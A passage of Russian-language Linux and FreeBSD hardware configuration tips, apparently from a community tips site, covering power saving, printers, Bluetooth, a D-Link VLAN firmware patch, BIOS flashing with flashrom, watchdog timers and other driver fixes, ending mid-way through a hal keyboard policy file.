/lib/modules/2.6.27-11-server/kernel/sound/pci/hda/snd-hda-intel.ko description: Intel HDA driver depends: snd-pcm,snd-page-alloc,snd

Советы по уменьшению энергопотребления ноутбука с FreeBSD (доп. ссылка 1) [комментарии]

1. CPU Включение демона powerd позволяет менять частоту/вольтаж CPU в зависимости от нагрузки. Отключаем "p4tcc" и "throttling" в пользу более эффективного EIST. В /boot/loader.conf: hint.p4tcc.0.disabled=1 hint.acpi_throttle.0.disabled=1 Изменяем метод поведения CPU в моменты неактивности с C1 (по умолчанию) на C2, который поддерживает отключение всех основных таймеров CPU. В /etc/rc.conf добавляем: performance_cx_lowest="C2" economy_cx_lowest="C2" Уменьшаем частоту генерации прерываний таймера, в loader.conf: kern.hz=100 Экономия 5 Вт. 2. PCI Для отключения питания не используемых PCI устройств (например, FireWire и USB контроллер) достаточно пересобрать ядро без драйверов ненужных устройств и указать в loader.conf: hw.pci.do_power_nodriver=3 Когда в устройстве возникнет необходимость, достаточно подгрузить драйвер как модуль ядра. Экономия 3 Вт. 3. WiFi и Bluetooth Аппаратное отключение WiFi и Bluetooth через обычно предусмотренную на ноутбуке комбинацию клавиш экономит около 2 Вт. 4. HDA модем Физическое удаление платы HDA-модема привело к экономии 1 Вт. 5. HDA звук Для уменьшения числа прерываний для звуковой карты в loader.conf прописываем: hint.pcm.0.buffersize=65536 hint.pcm.1.buffersize=65536 hw.snd.feeder_buffersize=65536 hw.snd.latency=7 6. Жесткий диск Для хранения временных файлов, чтобы не дергать лишний раз НЖМД, можно использовать tmpfs. Отключаем лишние периодически просыпающиеся сервисы, отключаем syslogd, используем легковесный оконный менеджер (например, icewm); Включение энергосберегающего spin-down режима работы 2.5" Hitachi SATA HDD привело к экономии 1 Вт, полное отключение - 2 Вт. Итог: Вышеописанные рекомендации + несколько дополнений внесенных в ветку FreebSD 8.0 (подробнее см. ссылку внизу на оригинальное сообщение) позволили добиться следующий результатов: acpiconf -i0 было: 2:24 часа (1621 mA) стало: 4:47 часа (826 mA) Для сравнения, оптимальные настройки Windows XP позволили продлить работу до 3:20 часов.

Решение проблемы с Nvidia драйверами во FreeBSD (доп. ссылка 1) Автор: Nirnroot [комментарии]

Проблема: после установки проприентарных драйверов Nvidia на FreeBSD X.Org зависает по непонятным причинам, либо кидает систему в перезагрузку. Когда возникает: экспериментальным путем было выведено, что если совокупная доступная оперативная память системы + память видеокарты больше ~3.300 Мб (конкретно - предел оперативной памяти, определяемый стандартным ядром FreeBSD x86). Решение: добавить в /boot/loader.conf строчку: machdep.disable_mtrrs=1

Решение проблемы с работой принтера Canon LBP2900 в Gentoo Linux Автор: Diozan [комментарии]

При отключении принтера демон ccpd вываливается, оставляя в памяти сервис captmon2, который начинает нестандартно работать, откушивая практически всю мощь процессора. Для ликвидации этой проблемы, перед отключением принтера процесс ccpd нужно выгружать стандартно. Поэтому загрузку этого процесса и его выгрузку лучше поручить сервису udev. Для этого создаем правило /etc/udev/rules.d/10-canon_LBP2900.rules #Own udev rule for CANON LBP2900 KERNEL=="lp*", BUS=="usb", SYSFS{idVendor}=="04a9", \ SYSFS{idProduct}=="2676", ACTION=="add", \ NAME="canon_lbp2900",SYMLINK="usb/%k" \ OWNER="root", GROUP="lp", MODE="0660", RUN+="/etc/init.d/ccpd start" KERNEL=="lp*", ACTION=="remove", NAME=="canon_lbp2900", RUN+="/etc/init.d/ccpd stop" Сам ccpd при этом нужно убрать из автозагрузки. Его загрузка и выгрузка будет производится при включении и выключении принтера.

Использование Skype вместе с Bluetooth-гарнитурой в SLED 10 (доп. ссылка 1) Автор: Alexander E Ivanov [комментарии]

Подключите bluetooth-адаптер к вашему компьютеру. Вы должны увидеть что-то похожее на это в /var/log/messages: usb 1-1: new full speed USB device using uhci_hcd and address 2 usb 1-1: new device found, idVendor=0a12, idProduct=0001 usb 1-1: new device strings: Mfr=0, Product=0, SerialNumber=0 Включите bluetooth, используя Yast: Hardware -> Bluetooth Включите аутентификацию и шифрование (Yast -> Bluetooth -> Security Options) Установите следующие пакеты, используя Yast, rug или zypper: automake, autoconf, gcc, alsa, alsa-tools, alsa-devel, m4, cvs, kernel-source. Добавьте самого себя в группу "audio" (используя права пользователя root): отредактируйте файл /etc/group и добавьте свое имя в конец строки группы "audio" (мое имя пользователя - stingleff): audio:x:17:stingleff Прим.переводчика: на мой взгляд нет необходимости лезть руками в этот файл. Подобную вещь можно сделать, используя Yast в консольном или gui-виде или просто выполнив команду от root: usermod -G audio stingleff Убедитесь, что bluetooth запущен, и определите MAC-адрес вашего bluetooth-адаптера. Напоминаю, что увидев надпись XX:XX:XX:XX:XX:XX вы должны поменять ее на актуальное значение вашего устройства: # sudo hcitool dev Devices: hci0 XX:XX:XX:XX:XX:XX Отредактируйте /etc/bluetooth/rfcomm.conf, включив туда MAC-адрес вашего адаптера: ... device XX:XX:XX:XX:XX:XX; ... Создайте shell-скрипт /etc/bluetooth/feed-pin.sh для отправки пин-кода для вашей гарнитуры: #!/bin/sh echo "PIN:0000" Сделайте скрипт исполняемым: # chmod 700 /etc/bluetooth/feed-pin.sh Задайте опцию pin_helper в файле /etc/bluetooth/hcid.conf для использования этого скрипта: ... pin_helper /etc/bluetooth/feed-pin.sh ... Перезапустите сервисы bluetooth: # sudo /etc/init.d/bluetooth restart Перевести гарнитуру в режим подключения и выяснить MAC-адрес. Напомню, что MAC-адрес YY:YY:YY:YY:YY:YY необходимо поменять на тот, который существует у вас: # sudo hcitool scan Scanning ... YY:YY:YY:YY:YY:YY Jabra BT 250v Соединиться с гарнитурой: # sudo hcitool cc YY:YY:YY:YY:YY:YY Проверим исходный код btsco. btsco используется для подключения гарнитуры к звуковому устройству: # cvs -d:pserver:anonymous@cvs.sf.net:/cvsroot/bluetooth-alsa co btsco Соберем и установим btsco: # cd btsco # ./bootstrap # ./configure # make # sudo make install Соберем и установим модуль ядра btsco: # cd kernel # make # sudo make install # sudo /sbin/depmod -e Загрузите модуль ядра emu10k1 (добавьте команду "/sbin/modprobe emu10k1" (без кавычек) в файл /etc/rc.d/boot.local для загрузки модуля автоматически во время старта системы): # sudo /sbin/modprobe emu10k1 Добавьте команду "/sbin/modprobe snd-bt-sco" (без кавычек) в файл /etc/rc.d/boot.local для загрузки модуля автоматически во время старта системы: # sudo /sbin/modprobe snd-bt-sco Соедините btsco с гарнитурой: # sudo btsco -v YY:YY:YY:YY:YY:YY Настройте skype на использования /dev/dsp1 (Tools -> Options -> Hand/Headsets) Для автоматизации процесса каждый раз во время запуска Skype сохраните этот скрипт как ~/bin/skype.sh и выполняйте вместо стандартной команды для запуска Skype: #!/bin/bash gnomesu btsco -v YY:YY:YY:YY:YY:YY & skype gnomesu pkill btsco Оригинал на английском: http://www.novell.com/communities/node/3758/using-skype-with-a-bluetooth-headset-sled-10

Включение поддержки VLAN на ADSL-маршрутизаторе D-Link 2500U/BRU/D Автор: halic [комментарии]

Переделанная прошивка позволяет указывать VLAN-id на ethernet порте модема D-Link 2500U/BRU/D (http://dlink.ru/ru/products/3/745.html). VLAN-id не указывается каким-то отдельным пунктом, а берется из IP. Если нужен VLAN-id 22, меняйте локальный IP модема на X.X.22.X, если 66 - X.X.66.X. Например: 192.168.55.1 для VLAN-id #55. Прошивка проверенно работает на модемах первой ревизии, т.е. без индикатора Internet. Оригинальные исходники можно загрузить здесь: ftp://ftp.dlink.ru/pub/ADSL/GPL_source_code/DSL-2500U_BRU_D/DLink_DSL-2500U_RU_1.20_release.tar.gz Патч: diff -urN ../DLink_DSL-2500U.original/hostTools/scripts/defconfig-bcm.template ./hostTools/scripts/defconfig-bcm.template --- ../DLink_DSL-2500U.original/hostTools/scripts/defconfig-bcm.template 2008-06-13 16:43:17.000000000 +0300 +++ ./hostTools/scripts/defconfig-bcm.template 2009-02-06 21:19:01.000000000 +0200 @@ -615,7 +615,7 @@ CONFIG_ATM_BR2684=m # CONFIG_ATM_BR2684_IPFILTER is not set CONFIG_ATM_RT2684=y -# CONFIG_VLAN_8021Q is not set +CONFIG_VLAN_8021Q=y # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set diff -urN ../DLink_DSL-2500U.original/hostTools/scripts/gendefconfig ./hostTools/scripts/gendefconfig --- ../DLink_DSL-2500U.original/hostTools/scripts/gendefconfig 2008-06-13 16:43:17.000000000 +0300 +++ ./hostTools/scripts/gendefconfig 2009-02-06 21:18:45.000000000 +0200 @@ -462,9 +462,9 @@ ############################################################ # VLAN config generation ############################################################ -if [ "$BUILD_VCONFIG" != "" -o "$BUILD_WANVLANMUX" != "" ]; then -SEDCMD="$SEDCMD -e 's/# CONFIG_VLAN_8021Q is not set/CONFIG_VLAN_8021Q=y/'" -fi +#if [ "$BUILD_VCONFIG" != "" -o "$BUILD_WANVLANMUX" != "" ]; then +#SEDCMD="$SEDCMD -e 's/# CONFIG_VLAN_8021Q is not set/CONFIG_VLAN_8021Q=y/'" +#fi ############################################################ # WAN operation over Ethernet diff -urN ../DLink_DSL-2500U.original/targets/fs.src/etc/rc.vlan ./targets/fs.src/etc/rc.vlan --- ../DLink_DSL-2500U.original/targets/fs.src/etc/rc.vlan 1970-01-01 03:00:00.000000000 +0300 +++ ./targets/fs.src/etc/rc.vlan 2009-02-07 06:32:13.000000000 +0200 @@ -0,0 +1,12 @@ +#!/bin/sh + +PATH=/bin:/sbin:/usr/bin +export PATH + +VID=$1 +VIF=eth0.$VID + +vconfig add eth0 $VID > /dev/null 2> /dev/null +ifconfig $VIF up > /dev/null 2> /dev/null +brctl addif br0 $VIF > /dev/null 2> /dev/null +brctl delif br0 eth0 > /dev/null 2> /dev/null diff -urN ../DLink_DSL-2500U.original/userapps/broadcom/cfm/html /DLink_Style/footer.html ./userapps/broadcom/cfm/html/DLink_Style/footer.html --- ../DLink_DSL-2500U.original/userapps/broadcom/cfm/html/DLink_Style/footer.html 2008-06-13 16:45:30.000000000 +0300 +++ ./userapps/broadcom/cfm/html/DLink_Style/footer.html 2009-02-09 22:02:46.000000000 +0200 @@ -11,9 +11,9 @@ <tr> <td class="footerTd" align="center"> <font color="white" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"> - Recommend: 800x600 pixels,High Color(16 Bits) + Recommend: 800x600 pixels,High Color(16 Bits) · <font color="red">VLAN POWERED</font> </font></td> </tr> </table> </body> -</html> \ No newline at end of file +</html> diff -urN ../DLink_DSL-2500U.original/userapps/opensource/busybox/brcm.config ./userapps/opensource/busybox/brcm.config --- ../DLink_DSL-2500U.original/userapps/opensource/busybox/brcm.config 2008-06-13 16:45:18.000000000 +0300 +++ ./userapps/opensource/busybox/brcm.config 2009-02-07 01:32:49.000000000 +0200 @@ -279,7 +279,7 @@ CONFIG_FEATURE_TFTP_DEBUG=n # CONFIG_TRACEROUTE is not set -CONFIG_VCONFIG=n +CONFIG_VCONFIG=y # CONFIG_WGET is not set # diff -urN ../DLink_DSL-2500U.original/userapps/opensource/busybox/networking/ifconfig.c ./userapps/opensource/busybox/networking/ifconfig.c --- ../DLink_DSL-2500U.original/userapps/opensource/busybox/networking/ifconfig.c 2008-06-13 16:45:17.000000000 +0300 +++ ./userapps/opensource/busybox/networking/ifconfig.c 2009-02-07 07:42:04.000000000 +0200 @@ -37,6 +37,7 @@ #include <string.h> /* strcmp and friends */ #include <ctype.h> /* isdigit and friends */ #include <stddef.h> /* offsetof */ +#include <unistd.h> #include <netdb.h> #include <sys/ioctl.h> #include <net/if.h> @@ -558,6 +559,28 @@ continue; } /* end of while-loop */ + if( strcmp(ifr.ifr_name, "br0") == 0 && + ((char*)&sai.sin_addr.s_addr)[0] != 0 && + ((char*)&sai.sin_addr.s_addr)[2] > 1 + ) + { + int __pid; + char __cmd[32]; + + if((__pid = fork()) == 0) + { + sprintf(__cmd, "/etc/rc.vlan %d", + (char) (((char*)&sai.sin_addr.s_addr)[2]) ); + execl("/bin/sh", "/bin/sh", "-c", __cmd, NULL); + exit(0); + } + else + { + if(__pid == -1) + fprintf(stderr, "ifconfig: unable to execute /etc/rc.vlan\n"); + } + } + return goterr; } Готовый бинарник можно запросить по адресу: <halic, который на инбоксе в россии>.

Решение проблемы с подключением web-камеры к Skype под Linux (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Если в Linux дистрибутиве с ядром 2.6.27 или старше локальная web-камера (например, камеры серии Logitech Quickcam Communicate работающие через gspca драйверы) в skype (или любой другой программе использующей интерфейс v4l1) отображает лишь шум на экране, для запуска skype нужно использовать скрипт: #!/bin/sh export LD_PRELOAD=/usr/lib/libv4l/v4l1compat.so skype v4l1compat.so входит в состав пакета libv4l Проверить в v4l1 ли причина можно так: LD_PRELOAD=/usr/lib/libv4l/v4l1compat.so mplayer tv:// -tv driver=v4l2:device=/dev/video0 Для настройки параметров отображения удобно использовать программу v4lucp (http://sourceforge.net/projects/v4l2ucp/) Создание скрипта для подмены skype: mv /usr/bin/skype /usr/bin/skype-bin; echo -e '#!/bin/sh\n\n export LD_PRELOAD=/usr/lib/libv4l/v4l1compat.so\n\nskype-bin' | tee -a /usr/bin/skype; sudo chmod +x /usr/bin/skype

Перепрошивка BIOS в Linux (доп. ссылка 1) Автор: stylliaga [комментарии]

Устанавливаем программу для перепрошивки. Загружаем с http://openbios.info/FlashRom) или ставим из Debian-based репозитория: apt-get install flashrom Перед записью новой прошивки в БИОС, желательно сохранить старую версию, то есть скопировать прошивку, которая уже прошита в БИОСе, чтобы потом можно было легко восстановить все обратно: flashrom -r MyBIOS.bin Где MyBIOS.bin - это имя файла, в который сохранится старая версия прошивки. После сохранения, можно уже на свой страх и риск записывать скачанную прошивку в БИОС: sudo flashrom -w NewBIOS.bin Где NewBIOS.bin - это имя скачанной прошивки. Также, можно добавить ключ -v чтобы программа проверила записанную прошивку и еще можно добавить ключ -V чтобы вывод работы был более информативным: sudo flashrom -Vvw NewBIOS.bin На примере была испытана материнская плата GIGABYTE GA-965P-DQ6 rev2.0 с Ubuntu 8.04 GNU/Linux на борту FlashRom при первом запуске без ключей показал вот такую информацию: krik@krik-desktop:~/temp$ sudo flashrom [sudo] password for krik: Calibrating delay loop... OK. No coreboot table found. Found chipset "Intel ICH8/ICH8R", enabling flash write... OK. Found chip "Macronix MX25L8005" (1024 KB) at physical address 0xfff00000. Found chip "Macronix unknown Macronix SPI chip" (0 KB) at physical address 0x0. Multiple flash chips were detected: MX25L8005 unknown Macronix SPI chip Please specify which chip to use with the -c option." На материнской плате установлено два чипа BIOS. Один главный, второй - запасной (в случае повреждения первого, прошивка восстанавливается со второго). Флэшер нашел оба этих чипа и предложил выбрать, который использовать. Чтобы выбрать чипсет - надо использовать ключ -c. Для этой материнской платы, чтобы прочитать уже стоящею прошивку БИОСа в файл, пришлось запустить ее с такими параметрами: sudo flashrom -r MyBIOS.bin -c MX25L8005 Где MyBIOS.bin - это файл, куда сохранялась прошивка, а MX25L8005 - выбранный чипсет. После того, как прошивка была забекапена, можно уже приступать непосредственно к записи новой прошивки. Перед записью прошивки в БИОС можно проверить, ту ли прошивку вы скачали - достаточно сравнить размер MyBIOS.bin и 965PDQ6.12K или открыть оба файла в hex-редакторе и сравнить начало и конец. Если все в порядке, приступаем: sudo flashrom -Vvw -c MX25L8005 965PDQ6.12K Где файл 965PDQ6.12K - и есть сама прошивка с официального сайта (на сайте расположены exe-файлы, но это всего-лишь SFX-RAR архив с самой прошивкой и программой-флэшером для ДОСа). Теперь можно перезагрузиться с новым биосом. Настройки NVRAM (CMOS) В линуксе не только можно прошивать БИОС, но и также сохранять или записывать его текущие настройки, причем штатными средствами. Нужно всего-лишь подгрузить модуль nvram и считать информацию с устройства /dev/nvram: modprobe nvram sudo dd if=/dev/nvram of=my_bios_cfg.bin Где my_bios_cfg.bin - это двоичный файл, куда сохранятся текущие настройки BIOS. Записать настройки обратно можно тем-же путем, только поменяв if на of и of на if: sudo dd of=/dev/nvram if=my_bios_cfg.bin

Использование аппаратного "watchdog" во FreeBSD Автор: Дмитрий Иванов [комментарии]

Некоторые материнские платы снабжены специальным устройством, делающим жесткую перезагрузку, если ОС не "дернула" вовремя это устройство. Называется оно "hardware watchdog timer". Таким образом, автоматическая и неминуемая перезагрузка гарантируется при "зависании" ОС. В частности, watchdog timer имеется на многих материнских платах Intel, причем не только на серверных. Соответствующий драйвер FreeBSD называется ichwd. Итак, если у нас материнка Intel, попробуем сделать так: kldload ichwd В сообщениях ядра (их можно посмотреть командой dmesg) при этом увидим что-то вроде: ichwd0: <Intel ICH9R watchdog timer> on isa0 ichwd0: Intel ICH9R watchdog timer (ICH9 or equivalent) Теперь ясно, что у нас действительно есть такой таймер. Действуем дальше. Для автоматической загрузки драйвера добавляем в /boot/loader.conf: ichwd_load="YES" Для запуска демона, "дергающего" watchdog, добавляем в /etc/rc.conf: watchdogd_enable="YES" Этот демон будет периодически "дергать" таймер, сообщая ему, что система все еще жива. Будьте осторожны с этим демоном! Если убить его как обычно (т.е. 15-м сигналом), он аккуратно снимет таймер с "боевого дежурства". Но если убить его 9-м сигналом, то таймер перестанет получать наши сигналы, и решит, что система зависла. Произойдет перезагрузка. Иногда watchdog надо включить в BIOS. На некоторых платах watchdog есть, но воспользоваться им невозможно. Иногда при инициализации драйвера появляется ругань на параллельный порт, но ее можно игнорировать. Проверено на FreeBSD 7.1-BETA2.

Печать на МФУ Samsung во FreeBSD с использованием драйверов Linux Автор: Alexander Shikoff [комментарии]

Настройка печати через CUPS на МФУ Samsung SCX-4521F с использованием драйверов Linux Окружение: - FreeBSD 7.1-PRERELEASE i386 - linux_base-f8 из портов - linux-png-1.2.8_2 из портов - linux-tiff из портов - linux-jpeg-6b.34 из портов - linux-xorg-libs-6.8.2_5 из портов - cups-base-1.3.9_2 из портов - cups-smb-backend-1.0_1 из портов Предполагается также, что линуксолятор вкомпилирован в ядро/подгружен и работает. Если он работает нормально, то в sysctl можно увидеть версию ядра: # sysctl -a|grep linux hw.snd.compat_linux_mmap: 0 compat.linux.oss_version: 198144 compat.linux.osrelease: 2.6.16 compat.linux.osname: Linux 1. Качаем с официального сайта Samsung драйвера для Linux (Linux Unified Driver). В моем случае файл назывался UnifiedLinuxDriver.tar.gz. 2. Распаковываем: # tar -zxf UnifiedLinuxDriver.tar.gz 3. Копируем ppd-файл с драйвером и нужный фильтр в папки CUPSа. Посмотреть, какой именно фильтр нужен, можно в соответствующем Вашему принтеру файлу ppd: # cat cdroot/Linux/noarch/at_opt/share/ppd/scx4x21.ppd |grep Filter *cupsFilter: "application/vnd.cups-postscript 0 rastertosamsungspl" # mkdir /usr/local/share/cups/model/samsung # cp cdroot/Linux/noarch/at_opt/share/ppd/scx4x21.ppd /usr/local/share/cups/model/samsung/ # cp cdroot/Linux/i386/at_root/usr/lib/cups/filter/rastertosamsungspl /usr/local/libexec/cups/filter/ 4. Теперь задача добавить в /compat/linux недостающие либы. Перед тем, как запускать линуксячий бинарник, стОит выполнить команду # /compat/linux/sbin/ldconfig Далее нужно выяснить, каких библиотек не хватает. Самый простой способ - запускать из командной строки /usr/local/libexec/cups/filter/rastertosamsungspl и смотреть, чего ему не хватает. Подкладывать их в /compat/linux/lib или /compat/linux/usr/lib по одной, и запускать /compat/linux/sbin/ldconfig. В моем случае не хватало следующих: libcups.so.2 libcupsimage.so.2 libgnutls.so.13 libgcrypt.so.11 libgpg-error.so.0 Найти и скачать RPM-пакеты для нужного релиза Fedroa, в которых есть эти библиотеки, можно с помощью Web-сервиса RPM Search, например http://rpm.pbone.net/ Итак, у нас появляется 4 файла rpm: # ls -1 *rpm cups-libs-1.3.4-2.fc8.i386.rpm gnutls-1.6.3-2.fc8.i386.rpm libgcrypt-1.2.4-6.i386.rpm libgpg-error-1.5-6.i386.rpm Достаем оттуда библиотеки: # rpm2cpio cups-libs-1.3.4-2.fc8.i386.rpm | tar -zxf - # rpm2cpio gnutls-1.6.3-2.fc8.i386.rpm | tar -zxf - # rpm2cpio libgcrypt-1.2.4-6.i386.rpm | tar -zxf - # rpm2cpio libgpg-error-1.5-6.i386.rpm | tar -zxf - Копируем их в /compat/linux: # cp -v lib/libgcrypt.so.11.2.3 lib/libgpg-error.so.0.3.1 /compat/linux/lib/ lib/libgpg-error.so.0.3.1 -> /compat/linux/lib/libgpg-error.so.0.3.1 lib/libgcrypt.so.11.2.3 -> /compat/linux/lib/libgcrypt.so.11.2.3 # cp -v usr/lib/libcups* /compat/linux/usr/lib/ usr/lib/libcupsimage.so.2 -> /compat/linux/usr/lib/libcupsimage.so.2 usr/lib/libcups.so.2 -> /compat/linux/usr/lib/libcups.so.2 # cp -v usr/lib/libgnutls.so.13.3.0 /compat/linux/usr/lib/tls/ usr/lib/libgnutls.so.13.3.0 -> /compat/linux/usr/lib/tls/libgnutls.so.13.3.0 # /compat/linux/sbin/ldconfig 5. Если все было сделано правильно, то бинарник должен нормально запуститься: # /usr/local/libexec/cups/filter/rastertosamsungspl INFO: Usage: rastertosamsungspl job-id user title copies options [file] ERROR: Wrong number of arguments 6. Далее идем броузером на http://localhost:631/ и подключаем принтер, как обычно. В разделе Make/Manufacturer должен появиться Samsung, и далее - в разделе Model/Driver - SCX-4x21 Series. Возможно, пропустил что-то, но в принципе суть изложена. Аналогичным образом, я думаю, можно завести любой принтер, если к нему есть нормальные Linux драйверы.

Организация в Linux совместного доступа к сканеру с нескольких машин (доп. ссылка 1) Автор: volhin [комментарии]

Пошаговое мини-howto, описывающее как расшарить сканер между linux-системами по аналогии с сетевым принтером. Предполагаем, что локально сканер на сервере настроен и работает (см. sane). Теперь нужно выполнить следующие действия: На сервере: 1) Ставим демон saned (входит в состав разных пакетов, в зависимости от дистрибутива, наример sane-utils или sane-server). 2) В /etc/sane.d/saned.conf добавляем ip клиента(ов) (см. примеры в том же файле). 3) Создаем файл /etc/xinetd.d/saned (для автоматического запуска сервера сканирования сетевым демоном xinetd) вида: service sane-port { disable = no socket_type = stream protocol = tcp user = scanner wait = no server = /usr/sbin/saned only_from = 192.168.1.1 192.168.1.2 # список машин, которым можно обращаться к сканеру } (здесь предполагается, что в системе присутствует пользователь "scanner" с правами на доступ к сканеру. конечно можно задать пользователя, от имени которого будет запускаться демон saned, по желанию. root строго не рекомендуется) 4) Выполняем команду (чтобы xinetd подхватил созданный нами файл): $ sudo /etc/init.d/xinetd reload На клиенте: 5) В /etc/sane.d/net.conf добавляем строку с ip сервера. 6) Пускаем xsane, сканируем, радуемся.

Подключение ИБП APC Smart в Linux через USB порт Автор: Сева [комментарии]

Имеется в наличии APC SC 1500 с USB кабелем, и Gentoo Linux 2.6.25-r7. Демон apcupsd никак не хотел с этим работать, apctest выдавал ошибку подключения. # lsusb Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 005 Device 002: ID 067b:2303 Prolific Technology, Inc. PL2303 Serial Port Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub В интернете я нашел только жалобы, на то, что данная связка не работает и нужно ставить apcuspd версию 3.10 из development ветки. Оказалось всё решается просто. Prolific Technology, Inc. PL2303 Serial Port - это обычный USB->COM конфертер. Благодаря ему, в системе создается serial устройство /dev/ttyUSB0, которое и нужно указать в файле конфигурации. После чего конфигурационный файл выглядит так. # cat /etc/apcupsd/apcupsd.conf |grep -v "#" UPSCABLE smart UPSTYPE apcsmart DEVICE /dev/ttyUSB0 А после, всё по man acpupsd.conf Если в системе вы не видите "Bus 005 Device 002: ID 067b:2303 Prolific Technology, Inc. PL2303 Serial Port", то в ядре нужно указать следующие опции Device Drivers ---> USB support --> USB Serial Converter support -> USB Prolific 2303 Single Port Serial Driver

Настройка bluetooth соединения в Asus EeePC [комментарии]

Не смотря на то, что в EeePС нет встроенного bluetooth адаптера, к нему легко можно подключить внешний bluetooth брелок с USB интерфейсом. Все необходимые консольные приложения доступны после установки пакета: apt-get install bluez-utils К сожалению для eeepc отсутствуют GUI хелперы для связывания устройств, из того что есть в репозиториях debian etch и xandros (например kdebluetooth), из-за проблем с зависимостями пакетов, подходит только bluez-gnome. Если bluetooth устройство самостоятельно может инициировать связывание, то все нормально, если нет - при попытке связать устройства используя только консольные средства начинаются проблемы, в bluez 3.x был изменен механизм связывания устройств, если ранее достаточно было создать простой скрипт для вывода PIN и прописать в options секцию hcid.conf - "pin_helper /etc/bluetooth/feed-pin.sh;", то теперь для получения PIN используется DBUS. В комплекте с bluez поставляется программа passkey-agent, предназначенная для связывания устройств, в пакет bluez-utils в Debian GNU/Linux эта программа по каким-то соображениям не была включена. Исходные тексты программы можно найти в /usr/share/doc/bluez-utils/examples, но для сборки потребуется установка окружения для сборки программ, что в условиях небольшого SSD диска не вполне оправдано. Запускается агент примерно так: passkey-agent --default 1234 где, 1234 пароль для связывания. Выход нашелся в апплете bluetooth-applet, который входит в состав пакета bluez-gnome. Запустив который при попытке связывания появляется диалоговое окно для ввода пароля связывания. Для настройки GPRS через сотовый телефон с Bluetooth интерфейсом можно использовать пакет 3egprs (устанавливает иконку на десктоп и скрипт /usr/sbin/gprsconf) с сайта http://www.3eportal.com/ Другой вариант - инициирование ppp сессии из консоли. Ниже пример настройки: Подключаем bluetooth адаптер в USB порт. Через dmesg смотрим, нашелся ли дня него драйвер. Запускаем инициализацию bluez: /etc/init.d/bluetooth start Смотрим поднялся ли интерфейс: hciconfig Если статус down, поднимаем его: hcicofig hci0 up Сканируем доступные устройства: hcitool scan Запоминаем адрес устройства. Для примера проверяем его доступность: l2ping 00:0A:0B:0C:0D:0E Адрес можно посмотреть командой: hcitool dev а определить поддерживаем ли bluetooth устройство GPRS: sdptool search DUN Создаем rfcomm интерфейс: rfcomm bind 0 [полученный адрес] 1 По идее rfcomm должен создаться автоматически, при надлежащей настройке /etc/bluetooth/rfcomm.conf, например: rfcomm0 { bind yes; device 00:0A:0B:0C:0D:0E; channel 1; comment "Mobile"; } Далее создаем файл конфигурации для pppd, /etc/ppp/peers/mts: lcp-echo-failure 0 lcp-echo-interval 0 /dev/rfcomm0 connect "/usr/sbin/chat -v -f /etc/ppp/peers/gprs" 115200 crtscts debug ipcp-accept-local noauth usepeerdns defaultroute noipdefault nodetach /etc/ppp/peers/gprs: ABORT BUSY ABORT 'NO CARRIER' ABORT VOICE ABORT 'NO DIALTONE' ABORT 'NO DIAL TONE' ABORT 'NO ANSWER' ABORT DELAYED '' 'AT' 'OK' 'AT+CGDCONT=1,"IP","internet.mts.ru"' 'OK' 'ATDT*99***1#' TIMEOUT 30 CONNECT Для beeline заменяем "internet.mts.ru" на "internet.beeline.ru", для мегафона пишем просто "internet". Подключаемся выполнив команду: pppd call mts Перевод wiki-страницы о настройке Bluetooth в Asus EeePC, выполненный Сгибневым Михаилом, можно найти на странице: https://www.opennet.ru/base/modem/bluetooth_eeepc.txt.html

Отключение засыпания DVB карты в ядре Linux Автор: va [комментарии]

идем в cd /usr/src/linux-*/drivers/media/dvb/dvb-core открываем файл dvb_frontend.c находим строчку static int dvb_powerdown_on_sleep = 1; изменяем на static int dvb_powerdown_on_sleep = 0; компилируем и ставим ;) теперь не нужно модуль dvb-core загружать с параметром dvb_shutdown_timeout=0

Настройка работы беспроводной карты на базе Broadcom BCM43xx в Ubuntu (доп. ссылка 1) Автор: E@zyVG [комментарии]

После установки Ubuntu 8.04 по умолчанию не работают беспроводные карты на базе чипов Broadcom BCM43xx из-за отсутствия firmware. Начиная с Linux ядра 2.6.24 работу данных карт в Linux обеспечивает драйвер b43, в более ранних версиях использовался драйвер bcm43xx. Для включения работы карты нужно установить пакет b43-fwcutter и получить firmware: sudo apt-get install b43-fwcutter и активировать на ноутбуке адаптер. Также можно воспользоваться меню Menu / System / Administration / Hardware Drivers. Драйвером b43 поддерживаются чипы: * bcm4303 (802.11b) * bcm4306 * bcm4309 (только 2.4GHz) * bcm4311 rev 1 / bcm4312 * bcm4311 rev 2 / bcm4312 (с 2.6.24 ядром работает через доп. патчи) * bcm4318 В настоящее время нет поддержки: * 802.11a для серий 4309 и 4312; * BCM 4328/4329 * не реализованы возможности представленные в проекте стандарта 802.11n; Сайт разработчиков драйвера: http://wireless.kernel.org/en/users/Drivers/b43

Настройка клавиатуры для Xorg при работающем hal-0.5.10 (доп. ссылка 1) Автор: Kroz [комментарии]

Решение представлено для Gentoo, но возможно проблема актуальна и для других дистрибутивов. При обновлении hal до версии 0.5.10 перестает нормально работать клавиатура. По множественным отзывам в Сети, у всех перестает работать преключатель раскладки, у меня еще были глюки с другими клавишами (например кнопка "вверх" работала как PrtScr и др.) Для начала приведу часть xorg.conf который у меня работал испокон веков: Section "InputDevice" Identifier "Chicony" Driver "kbd" Option "Protocol" "Standard" Option "XkbModel" "pc105" Option "XkbRules" "xorg" Option "XkbLayout" "us,ru,ua" Option "XkbVariant" ",winkeys" Option "XkbOptions" "grp:lwin_toggle,grp_led:scroll" Option "AutoRepeat" "250 30" EndSection Причина того, что эта конфигурация отвалилась, состоит в том, что новая версия hal просто игнорирует конфиг xorg.conf. Нашел два метода решения проблемы. Первый метод: http://ru.gentoo-wiki.com/HOWTO_hal_и_устройства_ввода Смысл в том, что создается файл политики hal, который содержит конфигурацию клавиатуры: /usr/share/hal/fdi/policy/20thirdparty/10russian-layout.fdi Учитывая, что в статье есть небольшие ошибки, приведу свой файл конфигурации. Рекомендую сопоставлять с приведенным выше xorg.conf <?xml version="1.0" encoding="ISO-8859-1"?> <match key="info.capabilities" contains="input.keyboard"> <merge key="input.x11_driver" type="string">kbd</merge> <merge 